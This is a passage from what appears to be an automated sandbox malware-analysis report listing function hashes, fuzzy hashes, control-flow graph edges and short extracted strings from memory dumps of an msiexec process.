                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e44dbb870667dfddd2fe8c4f25788f6f0942da93c1a0c4fb2804af6e17a83844
                                                                                                                                                                                    • Instruction ID: 9feea560746dc757e33c5e35d8321623419e97697510354b4a6516d590cdaa6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e44dbb870667dfddd2fe8c4f25788f6f0942da93c1a0c4fb2804af6e17a83844
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E71A375D05218DFDB64CF66C984BDDBBB2BF89301F1484AAD408A7364DB359A86CF40
                                                                                                                                                                                    Function 21A5178F Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 46159c83cd7082638218a453db9a6aa496fe514fb9c83f411237220d722fc5cb
                                                                                                                                                                                    • Instruction ID: 17a9bb1c3d8efe0c20c8a7ca87fb857ccb6a5c4bba796952240422b2e9e229c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46159c83cd7082638218a453db9a6aa496fe514fb9c83f411237220d722fc5cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F71A5B5E012198FEB68CF6AC944B9EBBF2BF89300F14C1E9D508A7254DB744A85CF50
                                                                                                                                                                                    Function 0307E97C Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ebfb67c504728b51620ea0b746629974be9979c496ecf10ed70e9b159110f9c3
                                                                                                                                                                                    • Instruction ID: d152fc5c80022f20911abf5a42f1caac3e96bd566a940a0391d557b8d5f804d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebfb67c504728b51620ea0b746629974be9979c496ecf10ed70e9b159110f9c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: B251B574E01208DFDB18DFAAD594A9DBBB2FF88300F24C469E815AB364DB359846CF54
                                                                                                                                                                                    Function 0307E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 503990967aa89e3d85fb06af737bc49026f7a652019a14c22748feb82c20d983
                                                                                                                                                                                    • Instruction ID: a6b8a8819c477436da35437ef1fad7b04c7f3a6b023298d0badc4bd2850bec7d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 503990967aa89e3d85fb06af737bc49026f7a652019a14c22748feb82c20d983
                                                                                                                                                                                    • Instruction Fuzzy Hash: D851C574E01208DFDB18DFAAD594A9DBBF2BF88300F248469E815AB364DB359945CF14
                                                                                                                                                                                    Function 21A53FE8 Relevance: 6.6, Strings: 5, Instructions: 381COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 21a53fe8-21a53ff1 1 21a53ff3-21a53ff8 0->1 2 21a53ffa-21a53ffd 0->2 3 21a54032-21a54035 1->3 4 21a54006-21a54009 2->4 5 21a53fff-21a54004 2->5 6 21a54012-21a54015 4->6 7 21a5400b-21a54010 4->7 5->3 8 21a54017-21a5401c 6->8 9 21a5401e-21a54021 6->9 7->3 8->3 10 21a54023-21a54028 9->10 11 21a5402a-21a5402d 9->11 10->3 12 21a54036-21a540a6 11->12 13 21a5402f 11->13 20 21a540ab-21a540ba call 21a53f90 12->20 13->3 23 21a54103-21a54106 20->23 24 21a540bc-21a540d7 20->24 25 21a5411c-21a5414b 23->25 26 21a54108-21a5410e 23->26 24->23 36 21a540d9-21a540dd 24->36 32 21a54157-21a5415d 25->32 33 21a5414d-21a54150 25->33 26->20 28 21a54110 26->28 29 21a54112-21a54119 28->29 34 21a54171-21a541a5 32->34 35 21a5415f-21a54162 32->35 33->32 37 21a54152-21a54155 33->37 35->34 38 21a54164-21a54166 35->38 39 21a540e6-21a540ef 36->39 40 21a540df-21a540e4 36->40 37->32 41 21a541a8-21a54200 37->41 38->34 42 21a54168-21a5416b 38->42 39->23 43 21a540f1-21a540fa 39->43 40->29 45 21a54207-21a54287 41->45 42->34 42->45 43->23 46 21a540fc-21a54101 43->46 65 21a542a7-21a542fd 45->65 66 21a54289-21a5428d 45->66 46->29 72 21a542ff-21a54306 65->72 73 21a54308-21a54311 65->73 102 21a54290 call 21a54385 66->102 103 21a54290 call 21a53fd7 66->103 104 21a54290 call 21a54351 66->104 105 21a54290 call 21a54088 66->105 106 21a54290 call 21a53fe8 66->106 68 21a54293-21a542a4 74 21a54323-21a5432c 72->74 75 21a54313-21a5431a 73->75 76 21a5431c 73->76 77 21a543c0-21a543c4 74->77 78 21a54332-21a5434f 74->78 75->74 76->74 79 21a543cd-21a543e9 77->79 107 21a543c7 call 21a544cf 77->107 78->79 83 21a543f0-21a5444a 79->83 84 21a543eb-21a543ee 79->84 85 21a54452-21a5445b 83->85 84->83 84->85 86 21a54462-21a54498 85->86 87 21a5445d-21a54460 85->87 89 21a544c7-21a544cd 86->89 98 21a5449a-21a544bf 86->98 87->86 87->89 98->89 102->68 103->68 104->68 105->68 106->68 107->79
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 8cq$Hbq$Hbq$Hbq$TJcq
                                                                                                                                                                                    • API String ID: 0-1895975235
                                                                                                                                                                                    • Opcode ID: 0ebcfc15f17d13ed07e3510e408af311963d47d9d13999508be0962a20ef14df
                                                                                                                                                                                    • Instruction ID: 8387fe1d187aee6b8118e1384088e85b2fd5e4b0c39717de809251ced69105d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ebcfc15f17d13ed07e3510e408af311963d47d9d13999508be0962a20ef14df
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2D1B234F082049FC745DB68C894AAE7BF6FF89320F2441A9E505EB3A1DA35DD46CB91
                                                                                                                                                                                    Function 21A53A50 Relevance: 5.3, Strings: 4, Instructions: 280COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 170 21a53a50-21a53a97 174 21a53c73-21a53c7e 170->174 175 21a53a9d-21a53a9f 170->175 176 21a53c85-21a53c90 174->176 175->176 177 21a53aa5-21a53aa9 175->177 182 21a53c97-21a53ca2 176->182 177->176 178 21a53aaf-21a53ae7 177->178 178->182 191 21a53aed-21a53af1 178->191 186 21a53ca9-21a53cb4 182->186 190 21a53cbb-21a53ce7 186->190 226 21a53cee-21a53d1a 190->226 192 21a53af3-21a53af7 191->192 193 21a53afd-21a53b01 191->193 192->186 192->193 195 21a53b03-21a53b0a 193->195 196 21a53b0c-21a53b10 193->196 197 21a53b28-21a53b2c 195->197 196->197 198 21a53b12-21a53b16 196->198 201 21a53b33-21a53b3a 197->201 202 21a53b2e-21a53b30 197->202 199 21a53b21 198->199 200 21a53b18-21a53b1f 198->200 199->197 200->197 204 21a53b43-21a53b47 201->204 205 21a53b3c 201->205 202->201 210 21a53c26-21a53c29 204->210 211 21a53b4d-21a53b51 204->211 205->204 206 21a53bc5-21a53bc8 205->206 207 21a53b96-21a53b99 205->207 208 21a53c61-21a53c6c 205->208 209 21a53bf8-21a53bfb 205->209 220 21a53bd3-21a53bf6 206->220 221 21a53bca-21a53bcd 206->221 215 21a53ba4-21a53bc3 207->215 216 21a53b9b-21a53b9e 207->216 208->174 213 21a53c02-21a53c21 209->213 214 21a53bfd 209->214 217 21a53c39-21a53c5c 210->217 218 21a53c2b-21a53c2e 210->218 211->208 219 21a53b57-21a53b5a 211->219 241 21a53b7f-21a53b83 213->241 214->213 215->241 216->190 216->215 217->241 218->217 223 21a53c30-21a53c33 218->223 224 21a53b61-21a53b7d 219->224 225 21a53b5c 219->225 220->241 221->220 221->226 223->217 230 21a53d21-21a53d93 223->230 224->241 225->224 226->230 252 21a53df5-21a53e59 230->252 253 21a53d95-21a53d98 230->253 275 21a53b86 call 21a53fd7 241->275 276 21a53b86 call 21a54088 241->276 277 21a53b86 call 21a53fe8 241->277 244 21a53b8c-21a53b93 270 21a53e62-21a53e72 252->270 271 21a53e5b-21a53e60 252->271 253->252 254 21a53d9a-21a53da9 253->254 257 21a53dc1-21a53dc5 254->257 258 21a53dab-21a53db1 254->258 262 21a53dc7-21a53de7 257->262 263 21a53ded-21a53df4 257->263 260 21a53db5-21a53db7 258->260 261 21a53db3 258->261 260->257 261->257 262->263 272 21a53e77-21a53e78 270->272 271->272 275->244 276->244 277->244
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $Hbq$Hbq$Hbq
                                                                                                                                                                                    • API String ID: 0-580995494
                                                                                                                                                                                    • Opcode ID: 06eab44ff74e914e609449d329ca8e418a80cd101e9e21ca40d6f7dbbb73d6fc
                                                                                                                                                                                    • Instruction ID: bd4aacfa11d139fccb97390a139272f02ae9b967c67db9599cd14e50c9fdda7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06eab44ff74e914e609449d329ca8e418a80cd101e9e21ca40d6f7dbbb73d6fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BA10134B08304AFDB559F78889866E7BA6FFC6360F244669E5168B3D1DF348D02CB91
                                                                                                                                                                                    Function 03075F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 873 3075f38-3075f5a 874 3075f70-3075f7b 873->874 875 3075f5c-3075f60 873->875 878 3076023-307604f 874->878 879 3075f81-3075f83 874->879 876 3075f62-3075f6e 875->876 877 3075f88-3075f8f 875->877 876->874 876->877 880 3075f91-3075f98 877->880 881 3075faf-3075fb8 877->881 885 3076056-30760ae 878->885 882 307601b-3076020 879->882 880->881 883 3075f9a-3075fa5 880->883 952 3075fba call 3075f31 881->952 953 3075fba call 3075f38 881->953 883->885 886 3075fab-3075fad 883->886 905 30760b0-30760b6 885->905 906 30760bd-30760cf 885->906 886->882 887 3075fc0-3075fc2 889 3075fc4-3075fc8 887->889 890 3075fca-3075fd2 887->890 889->890 891 3075fe5-3076004 889->891 892 3075fd4-3075fd9 890->892 893 3075fe1-3075fe3 890->893 899 3076006-307600f 891->899 900 3076019 891->900 892->893 893->882 956 3076011 call 307afd7 899->956 957 3076011 call 307afad 899->957 958 3076011 call 307af5b 899->958 900->882 902 3076017 902->882 905->906 908 30760d5-30760d9 906->908 909 3076163-3076165 906->909 910 30760db-30760e7 908->910 911 30760e9-30760f6 908->911 954 3076167 call 3076300 909->954 955 3076167 call 30762f0 909->955 919 30760f8-3076102 910->919 911->919 912 307616d-3076173 913 3076175-307617b 912->913 914 307617f-3076186 912->914 917 30761e1-3076240 913->917 918 307617d 913->918 933 3076247-307625e 917->933 918->914 922 3076104-3076113 919->922 923 307612f-3076133 919->923 931 3076115-307611c 922->931 932 3076123-307612d 922->932 924 3076135-307613b 923->924 925 307613f-3076143 923->925 928 307613d 924->928 929 3076189-30761da 924->929 925->914 930 3076145-3076149 925->930 928->914 929->917 930->933 934 307614f-3076161 930->934 931->932 932->923 934->914 952->887 953->887 954->912 955->912 956->902 957->902 958->902
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                                                                    • Opcode ID: a9c060002c6385a645f8e6e58ba7a7b0db231c2844ede392ec6f178fbf908cb5
                                                                                                                                                                                    • Instruction ID: df22768cafd2f1451de285662714fff68201619639b70929916887790ce41b27
                                                                                                                                                                                    • Opcode Fuzzy Hash: a9c060002c6385a645f8e6e58ba7a7b0db231c2844ede392ec6f178fbf908cb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8991C0347056498FDB15EF38C89866E7BE6BF89301F188569E8468B391DF39CC02CB95
                                                                                                                                                                                    Function 03076498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1068 3076498-30764a5 1069 30764a7-30764ab 1068->1069 1070 30764ad-30764af 1068->1070 1069->1070 1071 30764b4-30764bf 1069->1071 1072 30766c0-30766c7 1070->1072 1073 30764c5-30764cc 1071->1073 1074 30766c8 1071->1074 1075 30764d2-30764e1 1073->1075 1076 3076661-3076667 1073->1076 1078 30766cd-30766e0 1074->1078 1077 30764e7-30764f6 1075->1077 1075->1078 1079 307666d-3076671 1076->1079 1080 3076669-307666b 1076->1080 1086 307650b-307650e 1077->1086 1087 30764f8-30764fb 1077->1087 1089 30766e2-3076705 1078->1089 1090 3076718-307671a 1078->1090 1081 3076673-3076679 1079->1081 1082 30766be 1079->1082 1080->1072 1081->1074 1084 307667b-307667e 1081->1084 1082->1072 1084->1074 1088 3076680-3076695 1084->1088 1092 307651a-3076520 1086->1092 1093 3076510-3076513 1086->1093 1091 30764fd-3076500 1087->1091 1087->1092 1110 3076697-307669d 1088->1110 1111 30766b9-30766bc 1088->1111 1112 3076707-307670c 1089->1112 1113 307670e-3076712 1089->1113 1094 307672f-3076736 1090->1094 1095 307671c-307672e 1090->1095 1096 3076506 1091->1096 1097 3076601-3076607 1091->1097 1102 3076522-3076528 1092->1102 1103 3076538-3076555 1092->1103 1098 3076566-307656c 1093->1098 1099 3076515 1093->1099 1107 307662c-3076639 1096->1107 1104 307661f-3076629 1097->1104 1105 3076609-307660f 1097->1105 1108 3076584-3076596 1098->1108 1109 307656e-3076574 1098->1109 1099->1107 1114 307652c-3076536 1102->1114 1115 307652a 1102->1115 1138 307655e-3076561 1103->1138 1104->1107 1116 3076613-307661d 1105->1116 1117 3076611 1105->1117 1131 307664d-307664f 1107->1131 1132 307663b-307663f 1107->1132 1133 30765a6-30765c9 1108->1133 1134 3076598-30765a4 1108->1134 1119 3076576 1109->1119 1120 3076578-3076582 1109->1120 1121 30766af-30766b2 1110->1121 1122 307669f-30766ad 1110->1122 1111->1072 1112->1090 1113->1090 1114->1103 1115->1103 1116->1104 1117->1104 1119->1108 1120->1108 1121->1074 1126 30766b4-30766b7 1121->1126 1122->1074 1122->1121 1126->1110 1126->1111 1137 3076653-3076656 1131->1137 1132->1131 1136 3076641-3076645 1132->1136 1133->1074 1145 30765cf-30765d2 1133->1145 1143 30765f1-30765ff 1134->1143 1136->1074 1139 307664b 1136->1139 1137->1074 1140 3076658-307665b 1137->1140 1138->1107 1139->1137 1140->1075 1140->1076 1143->1107 1145->1074 1147 30765d8-30765ea 1145->1147 1147->1143
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ,bq$,bq
                                                                                                                                                                                    • API String ID: 0-2699258169
                                                                                                                                                                                    • Opcode ID: fc2e8171c85ddb4cb75636dc8f61f9f1891a9b1802a1a5187db02f6792a739ef
                                                                                                                                                                                    • Instruction ID: 71e3b9fd1f188d18c03061bfc1a2b5c3353eede45fea2e4f23d21e8df812b680
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc2e8171c85ddb4cb75636dc8f61f9f1891a9b1802a1a5187db02f6792a739ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4181B434E02909CFCB68CF69C48496EBBF2BF89600B588569D407DB364DB32E841CF65
                                                                                                                                                                                    Function 21A54351 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 8cq$TJcq
                                                                                                                                                                                    • API String ID: 0-1920894394
                                                                                                                                                                                    • Opcode ID: 7ef6f8c1bc10bbf301b31e2237a44cc81a50d8d0883ddecd716fc1d4f0d30555
                                                                                                                                                                                    • Instruction ID: f7e3e0536784314eea5c03bfc63d2820785dd8dd53ea2db11dfeed071bf99207
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ef6f8c1bc10bbf301b31e2237a44cc81a50d8d0883ddecd716fc1d4f0d30555
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310635B402099FCB45DFA8C580EDDBBB2FF88220F195594E505AF366DA30ED85CB91
                                                                                                                                                                                    Function 21A54385 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 8cq$TJcq
                                                                                                                                                                                    • API String ID: 0-1920894394
                                                                                                                                                                                    • Opcode ID: 6baa693c29591c407fae6fa4a6896c4e07683f0cb69e7f11069fa62d2d8f05d2
                                                                                                                                                                                    • Instruction ID: f49e519f765c8238a543f483b0306c2a0c4603bc028d002baab42dfbdded2417
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6baa693c29591c407fae6fa4a6896c4e07683f0cb69e7f11069fa62d2d8f05d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD312635B402098FCB45EFA8C580E9DBBB2FF88320F155594E505AF366DA70ED85CB90
                                                                                                                                                                                    Function 03070C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LR^q
                                                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                                                    • Opcode ID: 9581aa2bfcb49bf107e8e197a7bc33031992bef7ca1caf3dd1df97b2fc5783fe
                                                                                                                                                                                    • Instruction ID: d64ab3e1ac20c65031ee047192bf8a3c58d9a362f62b102cb7b6be79888d69ce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9581aa2bfcb49bf107e8e197a7bc33031992bef7ca1caf3dd1df97b2fc5783fe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E521078981219CFCB54EF24DD98A8DBBB1FB48301F1045E5D809AB758EB749E8ACF44
                                                                                                                                                                                    Function 03070CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LR^q
                                                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                                                    • Opcode ID: fd93310ebdff2959145f5ddc3e167da159d85a27eb1da221dad9e6b6c2afd35c
                                                                                                                                                                                    • Instruction ID: 66d02af8c0f797880b5164cb9d424b172c7d5a98f3e2b210c61128123f62e66b
                                                                                                                                                                                    • Opcode Fuzzy Hash: fd93310ebdff2959145f5ddc3e167da159d85a27eb1da221dad9e6b6c2afd35c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE522078D81219CFCB54EF24DD98A8DBBB1FB48301F1045A5D809AB758EB749E8ACF44
                                                                                                                                                                                    Function 21A54790 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Hbq
                                                                                                                                                                                    • API String ID: 0-1245868
                                                                                                                                                                                    • Opcode ID: 799d189379a8b1a6089f1f4ad841d14555f49c41dac740ca35fcae5f14e2b913
                                                                                                                                                                                    • Instruction ID: e2d02b24e7954e0431de9dedb61ff255934947b277bc406cbf59dd710e54235d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 799d189379a8b1a6089f1f4ad841d14555f49c41dac740ca35fcae5f14e2b913
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49318235F44209AFCB44EFB898556AE7BFAEFC9301B10857ED50ADB251EA348902C790
                                                                                                                                                                                    Function 0307AFD7 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q
                                                                                                                                                                                    • API String ID: 0-74704288
                                                                                                                                                                                    • Opcode ID: 8142a94216de9fff043d4baccfefd66aff1ea5a5f55b1e64b21e8646ec591c05
                                                                                                                                                                                    • Instruction ID: e65bbb8311aaf7325a4b708d9c261ce14561d663443574262fba519cf956d2a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8142a94216de9fff043d4baccfefd66aff1ea5a5f55b1e64b21e8646ec591c05
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A210875B053509FC706AB7888141AEBFF6AFC626131844BAD415CB391CE358C06C795
                                                                                                                                                                                    Function 21A548DB Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Hbq
                                                                                                                                                                                    • API String ID: 0-1245868
                                                                                                                                                                                    • Opcode ID: 06468db60cd2d48f51103ff285f6c557688af18a21d2a4ae742e7ad1a409b89e
                                                                                                                                                                                    • Instruction ID: 9ad42edee545bbbf2692031e0cf98f96c9a07c4fdaa0cfd3c210d6da163c89a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06468db60cd2d48f51103ff285f6c557688af18a21d2a4ae742e7ad1a409b89e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21E134A04245EFC745DF78C895AAEBBBAFFC5311F24806EE5059B361DA354D46CB40
                                                                                                                                                                                    Function 0307E007 Relevance: .7, Instructions: 654COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5fd7b61a9e4b0d8a28f0f4fd3b6c10a0c96a715a3f7d6d0d8fb6df81d1837044
                                                                                                                                                                                    • Instruction ID: 6e6abd0982c8b8089fd9cd24f1ac476d5b8f448e8e5cb5f52efa87d66f06b115
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fd7b61a9e4b0d8a28f0f4fd3b6c10a0c96a715a3f7d6d0d8fb6df81d1837044
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0812997A0A56468FD2517B35D6EC12ABF61FB1F36B7246C40F02B98455FB38048ACF61
                                                                                                                                                                                    Function 0307E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2dc38dcf68a5fe762dd13ab6d4ac019e3f304d601769fb5c8ea3018e8165cffd
                                                                                                                                                                                    • Instruction ID: 14ca4bb3ab91dffecb1bf61be733272d86a8336001b13bae5dd139150be95ade
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dc38dcf68a5fe762dd13ab6d4ac019e3f304d601769fb5c8ea3018e8165cffd
                                                                                                                                                                                    • Instruction Fuzzy Hash: A812987E0A56468FE2517B25D6EC12ABB61FB1F36B7246C40F02F98454FB38048ACF61
                                                                                                                                                                                    Function 21A54A68 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
